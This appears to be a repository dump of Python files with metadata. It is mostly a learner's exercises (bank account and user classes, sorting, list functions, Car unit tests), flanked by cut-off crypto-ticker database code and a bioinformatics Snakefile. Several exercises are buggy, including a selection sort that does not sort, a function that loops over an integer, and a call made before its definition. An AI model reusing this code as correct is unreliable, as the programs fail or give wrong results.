try:\n db.session().add(record)\n db.session().commit()\n print(\"⇩\", end=\"\")\n sys.stdout.flush()\n except Exception as e:\n db.session.rollback()\n log.error(f\"Could not insert ticker data: {str(e)}\")\n\n\n\ndef handle_ohlc_data(data, **kwargs):\n\n # The Ohlc socket feeds us with updates of the given\n # interval. 
If the windows is new, there is no record\n # with an identical endtime, so we should insert.\n # If there is a record with identical endtime, we should\n # update the record, and we discard the trades of that\n # window-interval (1m, 5m, 30m, 60m, ...)\n\n def getExistingOhlcEntry(pair, endtime, interval):\n return (\n db.session()\n .query(Ohlc)\n .filter(\n and_(\n Ohlc.pair == pair,\n Ohlc.endtime == endtime,\n Ohlc.interval == interval,\n )\n )\n .order_by(Ohlc.time.desc())\n .first()\n )\n\n interval = int(subscriptions[kwargs[\"channelId\"]][\"meta\"][\"interval\"])\n pair = subscriptions[kwargs[\"channelId\"]][\"pair\"]\n\n record = getExistingOhlcEntry(pair, data[1][1], interval)\n\n try:\n if record:\n record.time = data[1][0]\n record.begintime = float(data[1][1]) - (interval * 60.0)\n record.endtime = data[1][1]\n record.open = data[1][2]\n record.high = data[1][3]\n record.low = data[1][4]\n record.close = data[1][5]\n record.vwap = data[1][6]\n record.volume = data[1][7]\n record.count = data[1][8]\n\n print(\"↺\", end=\"\")\n sys.stdout.flush()\n\n else:\n\n record = Ohlc()\n record.pair = data[3]\n record.interval = interval\n record.pair = pair\n record.time = data[1][0]\n record.endtime = data[1][1]\n record.open = data[1][2]\n record.high = data[1][3]\n record.low = data[1][4]\n record.close = data[1][5]\n record.vwap = data[1][6]\n record.volume = data[1][7]\n record.count = data[1][8]\n\n print(\"⇩\", end=\"\")\n sys.stdout.flush()\n\n db.session().add(record)\n\n db.session().commit()\n\n except Exception as e:\n db.session.rollback()\n print(f\"Failure adding/updating ohcl: {e}\")\n\n\ndef run_ohlc_websocket(interval: int=0, pair: str= \"XBT/EUR\"):\n\n if interval == 0:\n log.warning(\"No interval window given, using 1 minute\")\n interval = 1\n\n kraken_rest_api_to_psql(interval=interval)\n\n log.info(f\"Setting up OHLC websocket\")\n client = kraken_client.WssClient()\n\n client.subscribe_public(\n subscription={\"name\": \"ohlc\", \"interval\": interval}, pair=[pair], callback=store2psql\n )\n\n log.info(\"⇩ = Insert new OHLC record for this interval window.\")\n log.info(\"↺ = Update existing record for this interval window.\")\n log.info(\"♥ = Websocket heartbeat.\")\n\n log.info(\"Starting websocket client\")\n\n client.start()\n\ndef run_ticker_websocket(portfolio: Portfolio):\n\n log.info(f\"Setting up Ticker websocket for {portfolio.pairs}\")\n\n client = kraken_client.WssClient()\n client.subscribe_public(\n subscription={\"name\": \"ticker\"}, pair=portfolio.pairs, callback=store2psql\n )\n\n log.info(\"Starting Ticker websocket\")\n client.start()" }, { "alpha_fraction": 0.5402550101280212, "alphanum_fraction": 0.5774134993553162, "avg_line_length": 23.7297306060791, "blob_id": "925b37ec94da2258d69916ed56164925437628b4", "content_id": "4907439fc90b2aa9d0c16405390f36eef7fc3e5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2745, "license_type": "no_license", "max_line_length": 78, "num_lines": 111, "path": "/db/models.py", "repo_name": "robinvanleeuwen/bitcoin-api", "src_encoding": "UTF-8", "text": "from sqlalchemy import *\nfrom sqlalchemy.orm import relationship\n\nfrom db import db\n\n\nclass Ticker(db.Model):\n\n __tablename__ = \"ticker\"\n __table_args__ = (\n Index('timestamp_idx', 'timestamp', unique=False),\n )\n\n id = Column(Integer, primary_key=True)\n\n pair = Column(CHAR(7))\n\n a_price = Column(Numeric(18, 5))\n a_whole_lot_volume = Column(Numeric(18, 8))\n a_lot_volume = 
Column(Numeric(18, 8))\n\n b_price = Column(Numeric(18, 5))\n b_whole_lot_volume = Column(Numeric(18, 8))\n b_lot_volume = Column(Numeric(18, 8))\n\n c_price = Column(Numeric(18, 5))\n c_lot_volume = Column(Numeric(18, 8))\n\n v_today = Column(Numeric(18, 8))\n v_24_hours = Column(Numeric(18, 8))\n\n p_today = Column(Numeric(18, 5))\n p_24_hours = Column(Numeric(18, 5))\n\n t_today = Column(Integer)\n t_24_hours = Column(Integer)\n\n l_today = Column(Numeric(18, 5))\n l_24_hours = Column(Numeric(18, 5))\n\n h_today = Column(Numeric(18, 5))\n h_24_hours = Column(Numeric(18, 5))\n\n o_today = Column(Numeric(18, 5))\n o_24_hours = Column(Numeric(18, 5))\n\n timestamp = Column(Numeric(18, 5))\n\n\nclass Ohlc(db.Model):\n\n __tablename__ = \"ohlc\"\n __table_args__ = (\n Index(\"idx_interval_endtime\", \"interval\", \"begintime\", unique=True),\n )\n\n def as_dict(self):\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n\n def as_canvasjs_datapoints(self):\n return {\n \"x\": self.endtime * 1000,\n \"y\": [\n self.open,\n self.high,\n self.low,\n self.close\n ]\n }\n\n id = Column(Integer, primary_key=True)\n pair = Column(CHAR(7))\n interval = Column(Integer())\n time = Column(Numeric(18, 4))\n begintime = Column(Numeric(18, 4))\n endtime = Column(Numeric(18, 4))\n open = Column(Numeric(18, 8))\n high = Column(Numeric(18, 8))\n low = Column(Numeric(18, 8))\n close = Column(Numeric(18, 8))\n vwap = Column(Numeric(18, 8))\n count = Column(Numeric(18, 8))\n\n\nclass Users(db.Model):\n __tablename__ = \"users\"\n __table_args__ = (\n Index(\"idx_name\", \"name\"),\n )\n\n id = Column(Integer, primary_key=True)\n name = Column(Text, unique=True)\n password = Column(Text)\n\n\nclass Tokens(db.Model):\n\n __tablename__ = \"tokens\"\n __table_args__ = (\n Index(\"idx_token\", \"token\"),\n )\n\n id = Column(Integer(), primary_key=True)\n token = Column(Text(), unique=True)\n user_id = Column(Integer(), ForeignKey(\"users.id\"))\n timestamp = Column(DateTime())\n ttl_max = Column(DateTime())\n ttl_increment = Column(Integer())\n last_ip_address = Column(Text())\n\n user = relationship(\"Users\", foreign_keys=[user_id])\n" } ]
17
robinsonium/python
https://github.com/robinsonium/python
77cb05e7a41ed5cda075dc68dd1d5edd98e55e9d
665ba466b4d4f8e8b7e8e497745951d58876fa9e
4d3ef74f22131ea3820c8bdb0d18ec72ae77dd1f
refs/heads/master
2022-12-08T05:27:22.342661
2020-08-26T03:19:33
2020-08-26T03:19:33
285,420,893
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6369942426681519, "alphanum_fraction": 0.6606936454772949, "avg_line_length": 39.1860466003418, "blob_id": "14e83b19f528000d47da55167d1bf4294ee08742", "content_id": "ad32ca0769d801ecac7b9bf9a1fa84b74a7f8672", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1730, "license_type": "no_license", "max_line_length": 102, "num_lines": 43, "path": "/oop/user2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "from bank_account import BankAccount\n\nclass User:\n def __init__(self,username,email_address):\n self.name=username\n self.email=email_address\n self.account=[]\n def create_account(self,int_rate,balance,account_name):\n self.account.append(BankAccount(int_rate,balance,account_name))\n return(self)\n def make_deposit(self,amount,account_name):\n if len(self.account.account_name)==0:\n print(f\"Error, {self.name} has no account created\")\n else:\n self.account.account_name.balance+=amount\n return(self)\n def make_withdrawal(self,amount):\n if not self.account:\n print(f\"Error, {self.name} has no account created\")\n else:\n self.account.balance-=amount\n return(self)\n def display_user_balance(self):\n if not self.account:\n print(f\"Error, {self.name} has no account created\")\n else:\n print(self.account,\":\",self.account.balance)\n def transfer_money(self,other_user,amount):\n other_user.make_deposit(amount)\n self.account.balance-=amount\n return(self)\n\nbrian=User(\"brian\",\"brian@dojo.com\")\njess=User(\"Jessica\",\"Jess@dojo.com\")\nrae=User(\"Raelynn\",\"rae@dojo.com\")\n# brian.create_account(1.04,200,\"checking\")\n\nbrian.make_deposit(150).make_deposit(200).make_deposit(50).make_withdrawal(200).display_user_balance()\n# jess.make_deposit(75).make_deposit(425).make_deposit(50).make_withdrawal(50).display_user_balance()\n# rae.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\n# brian.transfer_money(rae,150).display_user_balance()\n# brian.account.yield_interest().display_account_info()\n# rae.display_user_balance()\n\n " }, { "alpha_fraction": 0.6067415475845337, "alphanum_fraction": 0.670412003993988, "avg_line_length": 37.21428680419922, "blob_id": "7036fdb249e705387948184826360aa09156e8a5", "content_id": "4975ac6aeced5993eb4a601ce38e4ee0caf6280f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 534, "license_type": "no_license", "max_line_length": 82, "num_lines": 14, "path": "/python_fundamentals/intermediate1.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import random\ndef randInt(min=0, max= 100):\n if min !=0:\n max=max-min #\n num=random.random()*max+min\n elif max != 100:\n num=random.random()*max\n else:\n num = random.random()*max+min\n return round(num)\nprint(randInt()) # should print a random integer between 0 to 100 \nprint(randInt(max=50)) # should print a random integer between 0 to 50\nprint(randInt(min=50)) # should print a random integer between 50 to 100\nprint(randInt(min=50, max=500)) # should print a random integer between 50 and 500" }, { "alpha_fraction": 0.6443965435028076, "alphanum_fraction": 0.6465517282485962, "avg_line_length": 22.25, "blob_id": "db0287e8ef203a345567168e7dca4ee11d9540c4", "content_id": "68e6ef6835ea4b5b028befdf0153fe0003a8a14c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 464, "license_type": "no_license", "max_line_length": 114, 
"num_lines": 20, "path": "/oop/modularizing/parent.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "local_val=\"magical unicorns\"\ndef square(x):\n return x*x\n\nclass User:\n def __init__(self,name):\n self.name=name\n def say_hello(self):\n return(\"hello\")\n\nprint(square(5))\nuser=User(\"Anna\")\nprint(user.name)\nprint(user.say_hello())\n\nprint(__name__)\nif __name__ == \"__main__\":\n print(\"this file is being executed directly\")\nelse:\n print(\"This file is being executed because it is being imported by another file. the file is called\",__name__)" }, { "alpha_fraction": 0.5986159443855286, "alphanum_fraction": 0.6173010468482971, "avg_line_length": 26.283018112182617, "blob_id": "86db67b2c47805a6990135a395dfb8c0683b7a79", "content_id": "0a554710cdacfd95b6cc9bce8476b358e51e1268", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/python_fundamentals/number_players.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import random\n# Each player object must include a name, score, and guess\n# 1) create a list of objects\nplayers = [\n {'name': \"Natalie\",\n 'score': 0,\n 'guess': 9},\n {'name': \"Pat\",\n 'score': 0,\n 'guess': 8},\n {'name': \"Dan\",\n 'score': 0,\n 'guess': 5},\n {'name': \"Adrian\",\n 'score': 0,\n 'guess': 7},\n {'name': \"Odion\",\n 'score': 0,\n 'guess': 2},\n]\n\n# write a function that, given a list of player objects, returns the player with the highest score\n# a random number between 1 and 10 is generated\n# numbers greater than random number gain 10 points\n# numbers less than random number gain 5 points\n# numbers equal to random number gain 15 points\n\n## Pseduocode\n# declare a function and accept player list as paramater\n\n# Then, generate a random number\nrnd=round(random.random()*10)\nprint(\"our random number is\",rnd)\n# Next, a for loop should compare each guess to the rnd number and assign a score\ndef scoreit(list):\n highscorer=[]\n maxscore=0\n for player in list:\n if player['guess']>rnd:\n player['score']+=10\n elif player['guess']<rnd:\n player['score']+=5\n else:\n player['score']+=15\n if player['score']>maxscore:\n maxscore=player['score']\n highscorer=player['name']\n for player in list:\n print(player)\n print(\"And now, the final results:\")\n return(highscorer,maxscore)\n\nprint(scoreit(players))" }, { "alpha_fraction": 0.5177304744720459, "alphanum_fraction": 0.5992907881736755, "avg_line_length": 25.85714340209961, "blob_id": "8acd6a54bc8fd338d5907a902e15438fe37bbfab", "content_id": "6fcb83d7906c0420454911d5b52c2c6153aa4d9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 564, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/python_fundamentals/selectionsort.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "arr=[55,69,9,102,4,4,3,99,-1024,256,23,-23,-22,511,200,103,75,-1,-2]\n\ndef selectionsort(arr):\n#start at arr[0]\n#find the minimum of elements arr[1] through arr[last]\n#swap min with arr[0]\n#start at arr[1]\n#find the min in the remaining elements\n#swap min with arr[1]\n#...n\n last=len(arr)\n min=arr[0]\n for i in range(len(arr)):\n for k in range(i+1,last):\n if arr[k]<arr[i]: #find min of the remaining elements\n min=k\n temp=arr[i]\n arr[i]=arr[min]\n arr[k]=temp\n return(arr)\nprint(selectionsort(arr))\n" }, { 
"alpha_fraction": 0.6569536328315735, "alphanum_fraction": 0.7026489973068237, "avg_line_length": 33.272727966308594, "blob_id": "51dcabe450027e44c8bc9297a13ff2dbfbb8fc51", "content_id": "7f195abc5456016b88351060f0ee79bfa5049bb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 102, "num_lines": 44, "path": "/oop/user.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "class User:\n def __init__(self,username,email_address):\n self.name=username\n self.email=email_address\n self.account_balance=0\n def make_deposit(self,amount):\n self.account_balance+=amount\n return(self)\n def make_withdrawal(self,amount):\n self.account_balance-=amount\n return(self)\n def display_user_balance(self):\n print(self.name,\":\",self.account_balance)\n def transfer_money(self,other_user,amount):\n other_user.make_deposit(amount)\n self.account_balance-=amount\n return(self)\n\n\nbrian=User(\"brian\",\"brian@dojo.com\")\njess=User(\"Jessica\",\"Jess@dojo.com\")\nrae=User(\"Raelynn\",\"rae@dojo.com\")\n# brian.make_deposit(150)\n# brian.make_deposit(200)\n# brian.make_deposit(50)\n# brian.make_withdrawal(200)\n# brian.display_user_balance()\n# jess.make_deposit(75)\n# jess.make_deposit(425)\n# jess.make_withdrawal(50)\n# jess.make_withdrawal(50)\n# jess.display_user_balance()\n# rae.make_deposit(100)\n# rae.make_deposit(200)\n# rae.make_deposit(300)\n# rae.make_withdrawal(50)\n# rae.display_user_balance()\n# brian.transfer_money(rae,150)\nbrian.make_deposit(150).make_deposit(200).make_deposit(50).make_withdrawal(200).display_user_balance()\njess.make_deposit(75).make_deposit(425).make_deposit(50).make_withdrawal(50).display_user_balance()\nrae.make_deposit(100).make_deposit(200).make_deposit(300).make_withdrawal(50).display_user_balance()\nbrian.transfer_money(rae,150).display_user_balance()\n# brian.display_user_balance()\nrae.display_user_balance()\n\n " }, { "alpha_fraction": 0.5679442286491394, "alphanum_fraction": 0.5988053679466248, "avg_line_length": 31.419355392456055, "blob_id": "faa1aa23372fba59a70def3515c53e8a3050cedc", "content_id": "85762ea0319617a77e6856d513a34cf91157229c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2009, "license_type": "no_license", "max_line_length": 102, "num_lines": 62, "path": "/oop/car.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "import unittest\n\nclass Car:\n def __init__(self, make, model, year):\n \"\"\" initialize attributes to make a car\"\"\"\n self.make = make\n self.model = model\n self.year = year\n self.odomoter_reading = 0\n \n def get_descriptive_name(self):\n \"\"\" return a nicely formatted long name\"\"\"\n long_name=f\"{self.year} {self.make} {self.model}\"\n # use .title() to capitalize leading char\n return long_name.title()\n\n def set_odometer(self,mileage):\n \"\"\"\n Update odomoter value\n If mileage < current value, error\n \"\"\"\n if mileage >= self.odomoter_reading:\n self.odomoter_reading=mileage\n return self\n else:\n print(\"You can't roll back the odomoter!!\")\n return False\n \n def get_odometer(self):\n return(self.odomoter_reading)\n \n def add_miles(self,miles):\n \"\"\" increment current odomoter value by 'miles' \"\"\"\n self.odomoter_reading += miles\n return(self)\n\n \n\n# my_car=Car('chevy','luv',1980)\n# my_car.set_odometer(150).add_miles(25)\n# print(f\"My car is a {my_car.get_descriptive_name()} and it 
has {my_car.get_odometer()} miles on it\")\n# my_car.add_miles(50)\n# print(f\"Now my car has {my_car.get_odometer()} miles\")\nclass TestCar(unittest.TestCase):\n \"\"\"Tests for the Car class\"\"\"\n def test_set_odometer(self):\n my_car=Car('chevy','luv',1980)\n my_car.set_odometer(-100)\n self.assertFalse(my_car.get_odometer())\n my_car.set_odometer(2468)\n self.assertEqual(my_car.get_odometer(),2468)\n def test_descriptive_name(self):\n my_car=Car('chevy','luv',1980)\n self.assertEqual(my_car.get_descriptive_name(),'1980 Chevy Luv')\n def test_add_miles(self):\n my_car=Car('Nissan','Titan',2016)\n my_car.add_miles(1200).add_miles(2000).add_miles(10000)# should be 13200\n self.assertEqual(my_car.get_odometer(),13200)\n\n\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.43169400095939636, "alphanum_fraction": 0.5173041820526123, "avg_line_length": 26.5, "blob_id": "f862f86c6b443dbc7976cd971ac69d2e3fb5bb98", "content_id": "8bc5c5ac2c7462fce8b3831af69457f25955e786", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/python_fundamentals/bubblesort.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "arr=[55,69,9,102,4,4,3,99,-1024,256,23,-23,-22,511,200,103,75,-1,-2]\n\ndef bubblesort(arr):\n count=len(arr)\n swaps=0\n while count>=0:\n for i in range(len(arr)-1):\n first=arr[i]\n second=arr[i+1]\n print(f\"comparing {first} and {second}\")\n if first>second:\n arr[i],arr[i+1] = arr[i+1],arr[i]\n print(f\"swapping {first} and {second}\")\n swaps+=1\n count=count-1\n print(f\"Made {swaps} swaps\")\n return arr\n\n# test case\nprint(bubblesort(arr))" }, { "alpha_fraction": 0.4871794879436493, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 8.75, "blob_id": "a5afbdadb281b085e8c0e9a149b848b9983c7530", "content_id": "e556de403f466741710a260e4cc70ca5265abfd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/python_fundamentals/test.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "\nfoo()\n\ndef foo():\n print(\"I'm foo\")" }, { "alpha_fraction": 0.6388888955116272, "alphanum_fraction": 0.644444465637207, "avg_line_length": 24.571428298950195, "blob_id": "0b8b4865742130b5a9d1bd0829d76d208e81658e", "content_id": "9985161588d3cca4727a0e1cec2ead8f7518e4af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 180, "license_type": "no_license", "max_line_length": 59, "num_lines": 7, "path": "/oop/hackerrank/practice.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "# simple array sum\n# Given an array of integers, find the sum of its elements.\ndef sumArray(arr):\n total=0\n for i in range(len(arr)):\n total+=arr[i]\n return total\n\n" }, { "alpha_fraction": 0.6726352572441101, "alphanum_fraction": 0.7100039124488831, "avg_line_length": 39.74603271484375, "blob_id": "52e8cfdb46cab328e3e3ad53de2ca1f44633f368", "content_id": "ffcef3a7a88e87687b443947454010b8a30c416a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2569, "license_type": "no_license", "max_line_length": 305, "num_lines": 63, "path": "/python_fundamentals/basic_functions2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": 
"#Countdown - Create a function that accepts a number as an input. Return a new list that counts down by one, from the number (as the 0th element) down to 0 (as the last element).\n#Example: countdown(5) should return [5,4,3,2,1,0]\ndef countdown(num):\n mylist=[]\n for i in range(num,-1,-1):\n mylist.append(i)\n return(mylist)\nfoo=countdown(9)\nprint(foo)\n\n#version 2\ndef countdown2(num):\n mylist=list(range(num,-1,-1))\n return(mylist)\nbar=countdown2(20)\nprint(bar)\n\n#Print and Return - Create a function that will receive a list with two numbers. Print the first value and return the second.\n#Example: print_and_return([1,2]) should print 1 and return 2\ndef print_and_return(mylist):\n print(mylist[0])\n return(mylist[1])\n#test\nx=print_and_return([1,2])\nprint(\"x=\",x)\n\n#First Plus Length - Create a function that accepts a list and returns the sum of the first value in the list plus the list's length.\n#Example: first_plus_length([1,2,3,4,5]) should return 6 (first value: 1 + length: 5)\ndef first_plus_length(mylist):\n length=len(mylist)\n return(length+mylist[0]) \n#test case, should output '11'\nprint(first_plus_length([6,10,23,1,17]))\nprint(\"Done with first_plus_length\")\n#Values Greater than Second - Write a function that accepts a list and creates a new list containing only the values from the original list that are greater than its 2nd value. Print how many values this is and then return the new list. If the list has less than 2 elements, have the function return False\n#Example: values_greater_than_second([5,2,3,2,1,4]) should print 3 and return [5,3,4]\n#Example: values_greater_than_second([3]) should return False\ndef greater_than_second(mylist):\n newlist=[]\n second=mylist[1]\n count=0\n for i in range(0,len(mylist)-1):\n if mylist[i]>second:\n newlist.append(mylist[i])\n count+=1\n print(count)\n return(newlist)\n#test case\nfoo=greater_than_second([2,16,4,2,99,107,25,15])\nprint(foo)\nprint(\"done with greater_than_second\")\n\n#This Length, That Value - Write a function that accepts two integers as parameters: size and value. 
The function should create and return a list whose length is equal to the given size, and whose values are all the given value.\n#Example: length_and_value(4,7) should return [7,7,7,7]\n#Example: length_and_value(6,2) should return [2,2,2,2,2,2]\ndef this_length_that_value(size,value):\n newlist=[]\n for value in size:\n newlist.append(value)\n return(newlist)\n#test case\nprint(this_length_that_value(4,7))\nprint(this_length_that_value(6,2))\n\n\n" }, { "alpha_fraction": 0.5964391827583313, "alphanum_fraction": 0.6439169049263, "avg_line_length": 35.10714340209961, "blob_id": "1b3e5e40d533fd732ef278ab6ee03572cedd99a9", "content_id": "e3778baf1ab6c319cf11f988212169fbdd6aa750", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1011, "license_type": "no_license", "max_line_length": 126, "num_lines": 28, "path": "/oop/bank_account.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "class BankAccount:\n def __init__(self, int_rate, balance,account_name):\n self.int_rate=int_rate\n self.balance=balance \n def deposit(self, amount):\n self.balance+=amount\n return(self)\n def withdraw(self, amount):\n if self.balance>=amount:\n self.balance-=amount\n else:\n print(\"Insufficient funds: charging a $5 fee\")\n self.balance-=5\n return(self)\n def display_account_info(self):\n\t print(\"Balance: \",self.balance)\n def yield_interest(self):\n if self.balance>0:\n self.balance=self.balance*self.int_rate\n return(self)\n\n# acct1=BankAccount(1.05,400 )\n# acct2=BankAccount(1.045,0)\n# # acct1.deposit(10).withdraw(5).display_account_info()\n# # print(acct1.balance)\n\n# acct1.deposit(75).deposit(50).deposit(100).withdraw(125).yield_interest().display_account_info()\n# acct2.deposit(500).deposit(200).withdraw(50).withdraw(20).withdraw(100).withdraw(75).yield_interest().display_account_info()\n" }, { "alpha_fraction": 0.6313633918762207, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 36.70588302612305, "blob_id": "065f9b56f0a4eeb3f1a0fd8422fa2805c38b9639", "content_id": "556296d592a0fc92f2b7a8128f819628dd75db23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5127, "license_type": "no_license", "max_line_length": 205, "num_lines": 136, "path": "/python_fundamentals/loop_basic2.py", "repo_name": "robinsonium/python", "src_encoding": "UTF-8", "text": "# Biggie Size - Given a list, write a function that changes all positive numbers in the list to \"big\".\n# Example: biggie_size([-1, 3, 5, -5]) returns that same list, but whose values are now [-1, \"big\", \"big\", -5]\ndef biggie_size(mylist):\n for i in range(len(mylist)):\n if mylist[i]>0:\n mylist[i]=\"big\"\n return mylist\n#test case\nprint(biggie_size([-1, 3, 5, -5]))\nprint(\"Done with biggie size\")\n\n# Count Positives - Given a list of numbers, create a function to replace the last value with the number of positive values. 
(Note that zero is not considered to be a positive number).\n# Example: count_positives([-1,1,1,1]) changes the original list to [-1,1,1,3] and returns it\n# Example: count_positives([1,6,-4,-2,-7,-2]) changes the list to [1,6,-4,-2,-7,2] and returns it\ndef count_positives(mylist):\n count=0\n for i in range(len(mylist)):\n if mylist[i]>0:\n count+=1\n mylist[len(mylist)-1]=count\n return(mylist)\n#test case\nprint(count_positives([-1,1,1,1]))\nprint(count_positives([1,6,-4,-2,-7,-2]))\nprint(\"done with count_positives\")\n\n#Sum Total - Create a function that takes a list and returns the sum of all the values in the array.\n# Example: sum_total([1,2,3,4]) should return 10\n# Example: sum_total([6,3,-2]) should return 7\ndef sum_total(mylist):\n total=0\n for i in range(len(mylist)):\n total=total+mylist[i]\n return(total)\n#test case\nprint(sum_total([1,2,3,4]))\nprint(sum_total([6,3,-2]))\nprint(\"Done with sum_total()\")\n\n#Average - Create a function that takes a list and returns the average of all the values.\n# Example: average([1,2,3,4]) should return 2.5\ndef ave(mylist):\n count=len(mylist)\n total=0\n for i in range(len(mylist)):\n total=total+mylist[i]\n average=total/count\n return(average)\n#test case\nprint(ave([1,2,3,4]))# should return 2.5\nprint(\"done with ave()\")\n\n#Length - Create a function that takes a list and returns the length of the list.\n# Example: length([37,2,1,-9]) should return 4\n# Example: length([]) should return 0\ndef length(mylist):\n # assuming we aren't supposed to use len() here\n count=0\n for i in mylist:\n count+=1\n return(count)\n#test case\nprint(length([37,2,1,-9]))# should return 4\nprint(length([]))# should return 0\nprint(\"done with length()\")\n\n#Minimum - Create a function that takes a list of numbers and returns the minimum value in the list. If the list is empty, have the function return False.\n# Example: minimum([37,2,1,-9]) should return -9\n# Example: minimum([]) should return False\ndef minimum(mylist):\n if len(mylist)==0:\n return False\n else:\n val=mylist[0]# We'll assume the first element is the minimum, and correct it if needed as we go through the list\n for i in range(len(mylist)):\n if mylist[i]<val:\n val=mylist[i]\n return val\n#test case\nprint(minimum([37,2,1,-9]))\nprint(minimum([1,2,3,4]))\nprint(minimum([]))\nprint(\"Done with minimum()\")\n\n#Maximum - Create a function that takes a list and returns the maximum value in the array. 
If the list is empty, have the function return False.\n# Example: maximum([37,2,1,-9]) should return 37\n# Example: maximum([]) should return False\ndef maximum(mylist):\n if len(mylist)==0:\n return False\n else:\n val=mylist[0]# We'll assume the first element is the maximum, and correct it if needed as we go through the list\n for i in range(len(mylist)):\n if mylist[i]>val:\n val=mylist[i]\n return val\n#test case\nprint(maximum([37,2,1,-9]))\nprint(maximum([1,2,3,4]))\nprint(maximum([]))\nprint(\"Done with maximum()\")\n\n#Ultimate Analysis - Create a function that takes a list and returns a dictionary that has the sumTotal, average, minimum, maximum and length of the list.\n# Example: ultimate_analysis([37,2,1,-9]) should return {'sumTotal': 31, 'average': 7.75, 'minimum': -9, 'maximum': 37, 'length': 4 }\ndef ultimate_analysis(mylist):\n length=0\n minimum=mylist[0]\n maximum=mylist[0]\n sumtotal=0\n for i in mylist:\n length+=1 # Here we get our list length for use in the rest of the routine\n for i in range(length):\n if mylist[i]<minimum:\n minimum=mylist[i]\n elif mylist[i]>maximum:\n maximum=mylist[i]\n sumtotal=sumtotal+mylist[i]\n average=sumtotal/length\n return {'sumtotal':sumtotal,'average':average,'minimum':minimum,'maximum':maximum,'length':length}\n#test case\nprint(ultimate_analysis([37,2,1,-9]))\nprint(\"done with ultimate analysis\")\n\n#Reverse List - Create a function that takes a list and return that list with values reversed. Do this without creating a second list. (This challenge is known to appear during basic technical interviews.)\n# Example: reverse_list([37,2,1,-9]) should return [-9,1,2,37]\ndef reverse_list(mylist):\n lastindex=len(mylist)-1\n for i in range(int(lastindex/2)):\n temp=mylist[i]\n mylist[i]=mylist[lastindex-i]\n mylist[lastindex-i]=temp\n return mylist\n#test case\nprint(reverse_list([37,2,1,-9]))\nprint(reverse_list([11,10,9,8,7,6,5,4,3,2,1]))\nprint(\"done with reverse_list()\")" } ]
13
kieranrcampbell/clonealign-snv-analysis
https://github.com/kieranrcampbell/clonealign-snv-analysis
7a99043f40e976769e553c5b5803679ed2ae0bbf
5d9441f4a3efd5b8916db2d8a94ed7e24c4fc960
ba087a453efa0eefeeae4c21c878bcb1110bc33c
refs/heads/master
2021-08-30T17:16:19.121482
2017-12-18T19:33:24
2017-12-18T19:33:24
114,493,907
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6484622955322266, "alphanum_fraction": 0.6529908776283264, "avg_line_length": 43.29042053222656, "blob_id": "4a6f188db456270db7e9cd7967a43ba3ce674899", "content_id": "ddc1251b52c4d2a90d39f82de18adb2b552a1eab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14795, "license_type": "no_license", "max_line_length": 280, "num_lines": 334, "path": "/Snakefile", "repo_name": "kieranrcampbell/clonealign-snv-analysis", "src_encoding": "UTF-8", "text": "\"\"\"\nVariant calling for clones and 10x RNA-seq reads\n\n\"\"\"\n\n\nimport pandas as pd\n\nref_genome = \"/shahlab/kicampbell/reference/GRCh37-lite.fa\"\n\nclones = [\"A\", \"B\", \"C\"]\n\nrna_sample_names = \"SA501X2B\"\ndna_sample_names = \"SA501X3F\"\n\ncell_barcode_df = pd.read_csv(\"data/{}/rna/clone_assignments_{}.csv\".format(rna_sample_names, rna_sample_names))\ncell_barcodes = cell_barcode_df['barcode'].tolist()[0:10]\n\n\n\ndna_clone_variant_bcfs = expand(\"data/{dna_sample_name}/dna/variants/bcf/{dna_sample_name}-clone_{clone}_variants.bcf\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_clone_variant_vcfs = expand(\"data/{dna_sample_name}/dna/variants/vcf/{dna_sample_name}-clone_{clone}_variants.vcf\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_initial_snvs = expand(\"data/{dna_sample_name}/dna/variants/bed_initial_snvs/{dna_sample_name}-clone_{clone}_variants.bed\",\ndna_sample_name = dna_sample_names, clone = clones)\ndna_clone_specific_beds_unfiltered = 